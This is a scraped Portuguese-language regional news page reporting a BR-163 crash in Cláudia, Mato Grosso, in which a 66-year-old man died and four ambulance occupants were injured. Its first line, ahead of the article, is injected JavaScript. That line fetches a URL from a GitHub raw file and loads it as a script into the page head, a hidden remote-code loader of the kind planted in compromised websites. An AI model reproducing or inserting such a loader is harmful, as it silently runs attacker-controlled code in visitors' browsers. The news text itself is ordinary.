;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Fala meu Povo MT

Um homem faleceu e quatro indivíduos ficaram feridos em uma colisão entre um automóvel e uma ambulância

Foto: Sinop Urgente

Idoso morre e quatro ficam feridos em acidente na BR-163, em Cláudia

Um grave acidente de trânsito na BR-163 resultou na morte de Antônio Lopes, de 66 anos, na noite desta quarta-feira (29), no km 900 da rodovia, no município de Cláudia, a 580 km de Cuiabá. Outras quatro pessoas ficaram feridas e foram encaminhadas para atendimento médico.

De acordo com informações preliminares, o acidente envolveu um GM Monza, onde estava a vítima fatal, e uma ambulância da rede pública de Alta Floresta, que retornava com um paciente para Nova Mutum. A suspeita é de que tenha ocorrido uma colisão frontal, causando o tombamento da ambulância, que saiu da pista e parou fora da rodovia.

Com o impacto, Antônio Lopes foi ejetado do veículo e morreu no local. O carro em que ele estava ficou completamente destruído.

Na ambulância, havia quatro ocupantes, que foram socorridos e encaminhados ao Hospital Regional de Sinop. Até o momento, não há informações atualizadas sobre o estado de saúde das vítimas.

A Polícia Civil irá investigar as circunstâncias do acidente.

 

 

Da redação com informações do Olhar Direto

Sair da versão mobile